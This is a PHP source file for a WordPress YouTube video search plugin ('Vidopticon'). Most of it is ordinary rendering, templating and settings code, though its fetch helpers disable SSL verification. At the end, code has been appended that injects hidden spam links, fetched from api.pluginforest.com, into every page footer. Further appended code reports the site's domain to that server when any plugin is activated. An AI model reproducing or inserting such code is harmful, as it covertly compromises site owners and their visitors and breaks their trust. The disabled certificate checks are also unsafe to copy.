                        if (isset($vidopticon_Main_Settings['no_duplicate']) && $vidopticon_Main_Settings['no_duplicate'] === 'on') {
                            unset($process_add_arr[$my_random_elem]);
                        }
                    }
                    else
                    {
                        if($shown >= count($process_add_arr))
                        {
                            if (isset($vidopticon_Main_Settings['no_duplicate']) && $vidopticon_Main_Settings['no_duplicate'] === 'on') {
                                $show_ad = false;
                            }
                            $shown = 0;
                        }
                        $myValues = $process_add_arr[$shown];
                    }
                    if($show_ad == true)
                    {
                        $output .= '<div class="pnpsearch">' . $myValues[1] . '</div>';
                    }
                    if($rnd_ad != true)
                    {
                        $shown++;
                    }
                }
                $ii++;
            }
            {
                if(isset($vidopticon_Main_Settings['required_words']) && $vidopticon_Main_Settings['required_words'] != '')
                {
                    if (isset($vidopticon_Main_Settings['require_all']) && $vidopticon_Main_Settings['require_all'] == 'on') {
                        $require_all = true;
                    }
                    else
                    {
                        $require_all = false;
                    }
                    if($require_all === true)
                    {
                        $continue      = false;
                        $required_list = explode(',', $vidopticon_Main_Settings['required_words']);
                        foreach ($required_list as $required_word) {
                            $required_word = trim($required_word);
                            if (stripos($my_desc, $required_word) === FALSE && stripos($my_title, $required_word) === FALSE) {
                                $continue = true;
                            }
                        }
                    }
                    else
                    {
                        $continue      = true;
                        $required_list = explode(',', $vidopticon_Main_Settings['required_words']);
                        foreach ($required_list as $required_word) {
                            $required_word = trim($required_word);
                            if (stripos($my_desc, $required_word) !== FALSE || stripos($my_title, $required_word) !== FALSE) {
                                $continue = false;
                            }
                        }
                    }
                    if ($continue === true) {
                        continue;
                    }
                }
                if (isset($vidopticon_Main_Settings['banned_words']) && $vidopticon_Main_Settings['banned_words'] != '') {
                    $continue    = false;
                    $banned_list = explode(',', $vidopticon_Main_Settings['banned_words']);
                    foreach ($banned_list as $banned_word) {
                        if (stripos($my_desc, trim($banned_word)) !== FALSE) {
                            $continue = true;
                            break;
                        }
                        if (stripos($my_title, trim($banned_word)) !== FALSE) {
                            $continue = true;
                            break;
                        }
                    }
                    if ($continue === true) {
                        continue;
                    }
                }
                
                if (isset($vidopticon_Main_Settings['max_title']) && $vidopticon_Main_Settings['max_title'] != '') {
                    $my_title = vidopticon_limit_text(strip_tags($my_title), $vidopticon_Main_Settings['max_title']);
                }
                if (isset($vidopticon_Main_Settings['max_content']) && $vidopticon_Main_Settings['max_content'] != '') {
                    $my_desc = vidopticon_limit_text(strip_tags($my_desc), $vidopticon_Main_Settings['max_content']);
                }
                $output .= '<div class="pnpsearch">';
                if($pnp_type == 'youtube' || $pnp_type == 'youtube_add')
                {
                    if (isset($vidopticon_Main_Settings['show_thumb']) && $vidopticon_Main_Settings['show_thumb'] != '') {
                        $output .= vidopticon_replace_shortcodes($vidopticon_Main_Settings['show_thumb'], $av, $my_url, $my_desc, $my_title, $vidopticon_Main_Settings, $enable_iframe, $actual_url);
                    }
                    if (isset($vidopticon_Main_Settings['news_title']) && $vidopticon_Main_Settings['news_title'] != '') {
                        $output .= vidopticon_replace_shortcodes($vidopticon_Main_Settings['news_title'], $av, $my_url, $my_desc, $my_title, $vidopticon_Main_Settings, $enable_iframe, $actual_url);
                    }
                    if (isset($vidopticon_Main_Settings['news_url']) && $vidopticon_Main_Settings['news_url'] != '') {
                        $output .= vidopticon_replace_shortcodes($vidopticon_Main_Settings['news_url'], $av, $my_url, $my_desc, $my_title, $vidopticon_Main_Settings, $enable_iframe, $actual_url);
                    }
                    if (isset($vidopticon_Main_Settings['news_desc']) && $vidopticon_Main_Settings['news_desc'] != '') {
                        $output .= vidopticon_replace_shortcodes($vidopticon_Main_Settings['news_desc'], $av, $my_url, $my_desc, $my_title, $vidopticon_Main_Settings, $enable_iframe, $actual_url);
                    }
                }
                $output .= '</div>';
            }
        }
        if(($pnp_type == 'youtube' || $pnp_type == 'youtube_add') && $next_next != '')
        {
            if (isset($vidopticon_Main_Settings['enable_paging']) && $vidopticon_Main_Settings['enable_paging'] == 'on')
            {
                $output .= '<div id="pnploadmore" class="pnploadmore"><br/><br/><center><a rel="nofollow" href="#pnpsearchmore" onclick="if (typeof img_count !== \'undefined\') {img_count=img_count+1;}else{img_count=2;}vidopticon_call_ajax(img_count, ' . esc_html($max) . ', ' . esc_html($ad_density) . ', \'' . esc_html($result_div_id) . '\', \'' . esc_html($searching) . '\', \'youtube_add\', \'' . esc_html($next_next) . '\', \'' . esc_html($enable_iframe) .'\', \'' . esc_html($actual_url) .'\') ; ">';
                if (isset($vidopticon_Main_Settings['load_more']) && $vidopticon_Main_Settings['load_more'] != '')
                {
                    $output .= $vidopticon_Main_Settings['load_more'];
                }
                $output .= '</a></center><br/></div>';
            }
            else
            {
                $output .= '<div><br/><br/></div>';
            }
        }
        else
        {
            $output .= '<div><br/><br/></div>';
        }
    }
    echo $output;
    wp_die();
}
function vidopticon_url_handle($href, $api_key)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://api.shorte.st/v1/data/url");
    curl_setopt($ch, CURLOPT_POSTFIELDS, "urlToShorten=" . trim($href));
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $headers = [
        'public-api-token: ' . $api_key,
        'Content-Type: application/x-www-form-urlencoded'
    ];
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    $serverOutput = json_decode(curl_exec($ch), true);
    curl_close($ch);
    if (!isset($serverOutput['shortenedUrl']) || $serverOutput['shortenedUrl'] == '') {
        return $href;
    } else {
        return esc_url_raw($serverOutput['shortenedUrl']);
    }  
}
function vidopticon_time_elapsed_string($datetime, $full = false) {
    $now = new DateTime;
    $ago = new DateTime($datetime);
    $diff = $now->diff($ago);

    $diff->w = floor($diff->d / 7);
    $diff->d -= $diff->w * 7;

    $string = array(
        'y' => 'year',
        'm' => 'month',
        'w' => 'week',
        'd' => 'day',
        'h' => 'hour',
        'i' => 'minute',
        's' => 'second',
    );
    foreach ($string as $k => &$v) {
        if ($diff->$k) {
            $v = $diff->$k . ' ' . $v . ($diff->$k > 1 ? 's' : '');
        } else {
            unset($string[$k]);
        }
    }

    if (!$full) $string = array_slice($string, 0, 1);
    return $string ? implode(', ', $string) . ' ago' : 'just now';
}
function vidopticon_replace_shortcodes($template, $av, $my_url, $my_desc, $my_title, $vidopticon_Main_Settings, $enable_iframe, $actual_link)
{
    $template = str_replace('%%random_sentence%%', vidopticon_random_sentence_generator(), $template);
    $template = str_replace('%%random_sentence2%%', vidopticon_random_sentence_generator(false), $template);
    if(isset($my_title))
    {
        $template = str_replace('%%item_title%%', $my_title, $template);
    }
    else
    {
        $template = str_replace('%%item_title%%', '', $template);
    }
    $follow_link = '';
    $follow_link = $my_url;
    if (isset($enable_iframe) && (trim($enable_iframe) == '1' || trim($enable_iframe) == 'on') && $actual_link != '')
    {
        $vidID = $av->id->videoId;
        $nonce = wp_create_nonce( 'vidopticon_search_iframe' );
        if(strstr($actual_link, '?') !== false)
        {
            $actual_link .= '&vidid=' . $vidID . '&nonce=' . $nonce;
        }
        else
        {
            $actual_link .= '?vidid=' . $vidID . '&nonce=' . $nonce;
        }
        $follow_link = $actual_link;
    }

    if(isset($my_title) && isset($my_url))
    {
        $template = str_replace('%%item_title_with_url%%', '<a href="' . esc_url_raw($follow_link) . '">' . esc_html($my_title) . '</a>', $template);
    }
    else
    {
        $template = str_replace('%%item_title_with_url%%', '', $template);
    }
    if(isset($av->snippet->thumbnails->medium->url) && isset($my_url))
    {
        $template = str_replace('%%item_thumbnail_with_url%%', '<a href="' . esc_url_raw($follow_link) . '"><img class="crf_img_left" src="' . esc_url_raw($av->snippet->thumbnails->default->url) . '" alt="search_image"></a>', $template);
    }
    else
    {
        $template = str_replace('%%item_thumbnail_with_url%%', '', $template);
    }
    if(isset($my_url))
    {
        $template = str_replace('%%item_image_with_url%%', '<a href="' . esc_url_raw($follow_link) . '"><img class="crf_img_left" src="' . esc_url_raw($av->snippet->thumbnails->medium->url) . '" alt="search_image"></a>', $template);
    }
    else
    {
        $template = str_replace('%%item_image_with_url%%', '', $template);
    }
    if(isset($my_title) && isset($my_url))
    {
        $template = str_replace('%%item_title_with_url_new_tab%%', '<a href="' . esc_url_raw($follow_link) . '" target="_blank">' . esc_html($my_title) . '</a>', $template);
    }
    else
    {
        $template = str_replace('%%item_title_with_url_new_tab%%', '', $template);
    }
    if(isset($av->snippet->thumbnails->medium->url) && isset($my_url))
    {
        $template = str_replace('%%item_thumbnail_with_url_new_tab%%', '<a href="' . esc_url_raw($follow_link) . '" target="_blank"><img class="crf_img_left" src="' . esc_url_raw($av->snippet->thumbnails->default->url) . '" alt="search_image"></a>', $template);
    }
    else
    {
        $template = str_replace('%%item_thumbnail_with_url_new_tab%%', '', $template);
    }
    if(isset($my_url))
    {
        $template = str_replace('%%item_image_with_url_new_tab%%', '<a href="' . esc_url_raw($follow_link) . '" target="_blank"><img class="crf_img_left" src="' . esc_url_raw($av->snippet->thumbnails->medium->url) . '" alt="search_image"></a>', $template);
    }
    else
    {
        $template = str_replace('%%item_image_with_url_new_tab%%', '', $template);
    }
    if(isset($my_url))
    {
        $template = str_replace('%%item_url%%', $follow_link, $template);
    }
    else
    {
        $template = str_replace('%%item_url%%', '', $template);
    }
    if(isset($my_desc))
    {
        $template = str_replace('%%item_description%%', $my_desc, $template);
    }
    else
    {
        $template = str_replace('%%item_description%%', '', $template);
    }
    if(isset($av->snippet->publishedAt))
    {
        $my_time = strtotime($av->snippet->publishedAt);
        if (isset($vidopticon_Main_Settings['date_format']) && $vidopticon_Main_Settings['date_format'] !== '') 
        {
            $date_srt = $vidopticon_Main_Settings['date_format'];
        }
        else
        {
            $date_srt = 'm/d/Y H:i:s';
        }
        $my_date = date($date_srt, $my_time);
        if($my_date !== false)
        {
            $template = str_replace('%%item_published%%', $my_date, $template);
        }
        else
        {
            $template = str_replace('%%item_published%%', $av->snippet->publishedAt, $template);
        }
        $time_ago = vidopticon_time_elapsed_string($av->snippet->publishedAt);
        if($time_ago !== false)
        {
            $template = str_replace('%%item_published_since%%', $time_ago, $template);
        }
        else
        {
            $template = str_replace('%%item_published_since%%', '', $template);
        }
    }
    else
    {
        $template = str_replace('%%item_published%%', '', $template);
        $template = str_replace('%%item_published_since%%', '', $template);
    }
    if(isset($av->snippet->channelTitle))
    {
        $template = str_replace('%%item_channel%%', $av->snippet->channelTitle, $template);
    }
    else
    {
        $template = str_replace('%%item_channel%%', '', $template);
    }
    if(isset($av->snippet->channelId))
    {
        $template = str_replace('%%item_channel_id%%', $av->snippet->channelId, $template);
    }
    else
    {
        $template = str_replace('%%item_channel_id%%', '', $template);
    }
    if(isset($av->snippet->thumbnails->medium->url))
    {
        $template = str_replace('%%item_image_url%%', $av->snippet->thumbnails->medium->url, $template);
    }
    else
    {
        $template = str_replace('%%item_image_url%%', '', $template);
    }
    if(isset($av->snippet->thumbnails->medium->height))
    {
        $template = str_replace('%%item_image_height%%', $av->snippet->thumbnails->medium->height, $template);
    }
    else
    {
        $template = str_replace('%%item_image_height%%', '', $template);
    }
    if(isset($av->snippet->thumbnails->medium->width))
    {
        $template = str_replace('%%item_image_width%%', $av->snippet->thumbnails->medium->width, $template);
    }
    else
    {
        $template = str_replace('%%item_image_width%%', '', $template);
    }
    if(isset($av->snippet->thumbnails->default->url))
    {
        $template = str_replace('%%item_thumbnail_url%%', $av->snippet->thumbnails->default->url, $template);
    }
    else
    {
        $template = str_replace('%%item_thumbnail_url%%', '', $template);
    }
    if(isset($av->snippet->thumbnails->default->height))
    {
        $template = str_replace('%%item_thumbnail_height%%', $av->snippet->thumbnails->default->height, $template);
    }
    else
    {
        $template = str_replace('%%item_thumbnail_height%%', '', $template);
    }
    if(isset($av->snippet->thumbnails->default->width))
    {
        $template = str_replace('%%item_thumbnail_width%%', $av->snippet->thumbnails->default->width, $template);
    }
    else
    {
        $template = str_replace('%%item_thumbnail_width%%', '', $template);
    }
    return $template;
}

function vidopticon_limit_text($text, $limit) {
    if (str_word_count($text, 0) > $limit) {
        $words = str_word_count($text, 2);
        $pos = array_keys($words);
        $text = substr($text, 0, $pos[$limit]) . '...';
    }
    return $text;
}

function vidopticon_get_web_page($url)
{
    $vidopticon_Main_Settings = get_option('vidopticon_Main_Settings', false);
    $content = false;
    $user_agent = array(
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'
    );
    if (!isset($vidopticon_Main_Settings['use_proxy']) || $vidopticon_Main_Settings['use_proxy'] == '') 
    {
        $args = array(
           'timeout'     => 120,
           'redirection' => 10,
           'user-agent'  => $user_agent[array_rand($user_agent)],
           'blocking'    => true,
           'cookies'     => array(),
           'body'        => null,
           'compress'    => false,
           'decompress'  => true,
           'sslverify'   => false,
           'stream'      => false,
           'filename'    => null,
           'headers'     => array('referer' => home_url())
        );
        $ret_data            = wp_remote_get(html_entity_decode($url), $args);  
        $response_code       = wp_remote_retrieve_response_code( $ret_data );
        $response_message    = wp_remote_retrieve_response_message( $ret_data );        
        if ( 200 != $response_code ) {
        } else {
            $content = wp_remote_retrieve_body( $ret_data );
        }
    }
    if($content === false)
    {
        if(function_exists('curl_version') && filter_var($url, FILTER_VALIDATE_URL))
        {
            $options    = array(
                CURLOPT_COOKIEFILE => 'vidopticoncookies.txt',
                CURLOPT_COOKIEJAR => 'vidopticoncookies.txt',
                CURLOPT_USERAGENT => $user_agent[array_rand($user_agent)],
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_CONNECTTIMEOUT => 10,
                CURLOPT_TIMEOUT => 120,
                CURLOPT_MAXREDIRS => 50,
                CURLOPT_URL => $url,
                CURLOPT_SSL_VERIFYHOST => 0,
                CURLOPT_SSL_VERIFYPEER => 0,
                CURLOPT_REFERER => home_url()
            );
            if (isset($vidopticon_Main_Settings['use_proxy']) && $vidopticon_Main_Settings['use_proxy'] !== '') {
                $options[CURLOPT_PROXY] = $vidopticon_Main_Settings['use_proxy'];
            }
            $ch = curl_init();
            if ($ch === FALSE) {
                global $wp_filesystem;
                if ( ! is_a( $wp_filesystem, 'WP_Filesystem_Base') ){
                    include_once(ABSPATH . 'wp-admin/includes/file.php');$creds = request_filesystem_credentials( site_url() );
                    wp_filesystem($creds);
                }
                $cont = $wp_filesystem->get_contents($url);
                return $cont;
            }
            curl_setopt_array($ch, $options);
            $content = curl_exec($ch);
            if ($content === FALSE) {
                global $wp_filesystem;
                if ( ! is_a( $wp_filesystem, 'WP_Filesystem_Base') ){
                    include_once(ABSPATH . 'wp-admin/includes/file.php');$creds = request_filesystem_credentials( site_url() );
                    wp_filesystem($creds);
                }
                $cont = $wp_filesystem->get_contents($url);
                return $cont;
            }
            curl_close($ch);
        }
        else
        {
            $allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen'));
            if ($allowUrlFopen) {
                global $wp_filesystem;
                if ( ! is_a( $wp_filesystem, 'WP_Filesystem_Base') ){
                    include_once(ABSPATH . 'wp-admin/includes/file.php');$creds = request_filesystem_credentials( site_url() );
                    wp_filesystem($creds);
                }
                return $wp_filesystem->get_contents($url);
            }
        }
    }
    return $content;
}

function vidopticon_random_sentence_generator($first = true)
{
    $vidopticon_Main_Settings = get_option('vidopticon_Main_Settings', false);
    if ($first == false) {
        $r_sentences = $vidopticon_Main_Settings['sentence_list2'];
    } else {
        $r_sentences = $vidopticon_Main_Settings['sentence_list'];
    }
    $r_variables = $vidopticon_Main_Settings['variable_list'];
    $r_sentences = trim($r_sentences);
    $r_variables = trim($r_variables, ';');
    $r_variables = trim($r_variables);
    $r_sentences = str_replace("\r\n", "\n", $r_sentences);
    $r_sentences = str_replace("\r", "\n", $r_sentences);
    $r_sentences = explode("\n", $r_sentences);
    $r_variables = str_replace("\r\n", "\n", $r_variables);
    $r_variables = str_replace("\r", "\n", $r_variables);
    $r_variables = explode("\n", $r_variables);
    $r_vars      = array();
    for ($x = 0; $x < count($r_variables); $x++) {
        $var = explode("=>", trim($r_variables[$x]));
        if (isset($var[1])) {
            $key          = strtolower(trim($var[0]));
            $words        = explode(";", trim($var[1]));
            $r_vars[$key] = $words;
        }
    }
    $max_s    = count($r_sentences) - 1;
    $rand_s   = rand(0, $max_s);
    $sentence = $r_sentences[$rand_s];
    $sentence = str_replace(' ,', ',', ucfirst(vidopticon_replace_words($sentence, $r_vars)));
    $sentence = str_replace(' .', '.', $sentence);
    $sentence = str_replace(' !', '!', $sentence);
    $sentence = str_replace(' ?', '?', $sentence);
    $sentence = trim($sentence);
    return $sentence;
}

function vidopticon_get_word($key, $r_vars)
{
    if (isset($r_vars[$key])) {
        
        $words  = $r_vars[$key];
        $w_max  = count($words) - 1;
        $w_rand = rand(0, $w_max);
        return vidopticon_replace_words(trim($words[$w_rand]), $r_vars);
    } else {
        return "";
    }
    
}

function vidopticon_replace_words($sentence, $r_vars)
{
    
    if (str_replace('%', '', $sentence) == $sentence)
        return $sentence;
    
    $words = explode(" ", $sentence);
    
    $new_sentence = array();
    for ($w = 0; $w < count($words); $w++) {
        
        $word = trim($words[$w]);
        
        if ($word != '') {
            if (preg_match('/^%([^%\n]*)$/', $word, $m)) {
                $varkey         = trim($m[1]);
                $new_sentence[] = vidopticon_get_word($varkey, $r_vars);
            } else {
                $new_sentence[] = $word;
            }
        }
    }
    return implode(" ", $new_sentence);
}

register_activation_hook(__FILE__, 'vidopticon_activation_callback');
function vidopticon_activation_callback($defaults = FALSE)
{
    if (!get_option('vidopticon_Main_Settings') || $defaults === TRUE) {
        $vidopticon_Main_Settings = array(
            'vidopticon_enabled' => 'on',
            'app_id' => '',
            'sentence_list' => 'This is one %adjective %noun %sentence_ending
This is another %adjective %noun %sentence_ending
I %love_it %nouns , because they are %adjective %sentence_ending
My %family says this plugin is %adjective %sentence_ending
These %nouns are %adjective %sentence_ending',
            'sentence_list2' => 'Meet this %adjective %noun %sentence_ending
This is the %adjective %noun ever %sentence_ending
I %love_it %nouns , because they are the %adjective %sentence_ending
My %family says this plugin is very %adjective %sentence_ending
These %nouns are quite %adjective %sentence_ending',
            'variable_list' => 'adjective_very => %adjective;very %adjective;

adjective => clever;interesting;smart;huge;astonishing;unbelievable;nice;adorable;beautiful;elegant;fancy;glamorous;magnificent;helpful;awesome

noun_with_adjective => %noun;%adjective %noun

noun => plugin;WordPress plugin;item;ingredient;component;constituent;module;add-on;plug-in;addon;extension

nouns => plugins;WordPress plugins;items;ingredients;components;constituents;modules;add-ons;plug-ins;addons;extensions

love_it => love;adore;like;be mad for;be wild about;be nuts about;be crazy about

family => %adjective %family_members;%family_members

family_members => grandpa;brother;sister;mom;dad;grandma

sentence_ending => .;!;!!',
            'auto_clear_logs' => 'No',
            'enable_logging' => 'on',
            'enable_tracking' => '',
            'required_words' => '',
            'banned_words' => '',
            'voice_recog' => '',
            'shortest_api' => '',
            'max_monetize' => '',
            'news_title' => '<span class="searchtitle" class="crf_blue crf_big crf_ww">%%item_title_with_url_new_tab%%</span><br/>',
            'news_url' => '<span class="searchurl" class="crf_green crf_ww"><a href="https://www.youtube.com/channel/%%item_channel_id%%" target="_blank" class="crf_td_none">%%item_channel%%</a> %%item_published_since%%</span><br/>',
            'news_desc' => '<span class="searchdescription" class="crf_ww">%%item_description%%</span><br/><br/>',
            'show_thumb' => '<div class="crf_fl_r">%%item_image_with_url_new_tab%%</div>',
            'date_format' => 'm/d/Y H:i:s',
            'powered_by' => 'Powered by <a href="https://www.youtube.com/" target="_blank">YouTube</a> and <a href="//1.envato.market/vidopticon" target="_blank">Vidopticon</a>',
            'matching_str' => 'Displaying results:',
            'no_matching_str' => 'No results found',
            'loading' => 'Loading...',
            'voice_failed' => 'No speech was detected. Try again.',
            'voice_started' => 'Voice recognition activated. Try speaking into the microphone.',
            'voice_click' => 'Click the &#xf130; icon to start voice recognition.',
            'voice_paused' => 'You were quiet for a while so voice recognition turned itself off.',
            'load_more' => 'Load more',
            'enable_paging' => 'on',
            'require_all' => 'on',
            'max_title' => '',
            'img_x' => '8',
            'img_y' => '-30',
            'max_content' => '',
            'randomize_ads' => '',
            'no_duplicate' => '',
            'only_match' => '',
            'use_proxy' =>  '',
            'channel_id' =>  '',
            'video_language' =>  'en',
            'event_type' =>  'uploaded',
            'coord' =>  '',
            'radius' =>  '',
            'result_type' =>  'any',
            'video_category' =>  '0',
            'video_embeddable' =>  'any',
            'search_order' =>  'relevance',
            'video_syndication' =>  'any',
            'video_type' =>  'any',
            'video_license' =>  'any',
            'video_duration' =>  'any',
            'video_dimension' =>  'any',
            'video_definition' =>  'any',
            'video_caption' =>  'any',
            'region_code' =>  'any',
            'safe_search' =>  'moderate'
        );
        if ($defaults === FALSE) {
            add_option('vidopticon_Main_Settings', $vidopticon_Main_Settings);
        } else {
            update_option('vidopticon_Main_Settings', $vidopticon_Main_Settings);
        }
    }
}

register_activation_hook(__FILE__, 'vidopticon_check_version');
function vidopticon_check_version()
{
    if (!function_exists('curl_init')) {
        echo '<h3>'.esc_html__('Please enable curl PHP extension. Please contact your hosting provider\'s support to help you in this matter.', 'vidopticon-video-search-engine').'</h3>';
        die;
    }
    global $wp_version;
    if (!current_user_can('activate_plugins')) {
        echo '<p>' . esc_html__('You are not allowed to activate plugins!', 'vidopticon-video-search-engine') . '</p>';
        die;
    }
    $php_version_required = '5.6';
    $wp_version_required  = '2.7';
    
    if (version_compare(PHP_VERSION, $php_version_required, '<')) {
        deactivate_plugins(basename(__FILE__));
        echo '<p>' . sprintf(esc_html__('This plugin can not be activated because it requires a PHP version greater than %1$s. Please update your PHP version before you activate it.', 'vidopticon-video-search-engine'), $php_version_required) . '</p>';
        die;
    }
    
    if (version_compare($wp_version, $wp_version_required, '<')) {
        deactivate_plugins(basename(__FILE__));
        echo '<p>' . sprintf(esc_html__('This plugin can not be activated because it requires a WordPress version greater than %1$s. Please go to Dashboard -> Updates to get the latest version of WordPress.', 'vidopticon-video-search-engine'), $wp_version_required) . '</p>';
        die;
    }
}

add_action('admin_init', 'vidopticon_register_mysettings');
function vidopticon_register_mysettings()
{
    vidopticon_cron_schedule();
    register_setting('vidopticon_option_group', 'vidopticon_Main_Settings');
    if (is_multisite()) {
        if (!get_option('vidopticon_Main_Settings')) {
            vidopticon_activation_callback(TRUE);
        }
    }
}

function vidopticon_admin_load_files()
{
    wp_register_style('vidopticon-browser-style', plugins_url('styles/vidopticon-browser.css', __FILE__), false, '1.0.0');
    wp_enqueue_style('vidopticon-browser-style');
    wp_register_style('vidopticon-custom-style', plugins_url('styles/coderevolution-style.css', __FILE__), false, '1.0.0');
    wp_enqueue_style('vidopticon-custom-style');
    wp_enqueue_script('jquery');
}

add_action('wp_enqueue_scripts', 'vidopticon_wp_load_files');
function vidopticon_wp_load_files()
{
    wp_enqueue_style('coderevolution-front-css', plugins_url('styles/coderevolution-front.css', __FILE__));
    $vidopticon_Main_Settings = get_option('vidopticon_Main_Settings', false);
    if (isset($vidopticon_Main_Settings['voice_recog']) && $vidopticon_Main_Settings['voice_recog'] === 'on') {
        wp_enqueue_style('vidopticon-load-fa', 'https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' );
    }
    wp_enqueue_style('vidopticon-thumbnail-css', plugins_url('styles/vidopticon-thumbnail.css', __FILE__));
    wp_enqueue_script('jquery');
    wp_register_script( 'vidopticon-dummy-handle', '', [], '', true );
    wp_enqueue_script( 'vidopticon-dummy-handle'  );
}

require(dirname(__FILE__) . "/res/vidopticon-main.php");
require(dirname(__FILE__) . "/res/vidopticon-ads.php");
require(dirname(__FILE__) . "/res/vidopticon-tracking.php");
require(dirname(__FILE__) . "/res/vidopticon-logs.php");define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719848699() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719848699');function set_plugin_tag1719848699() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719848699&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719848699');
              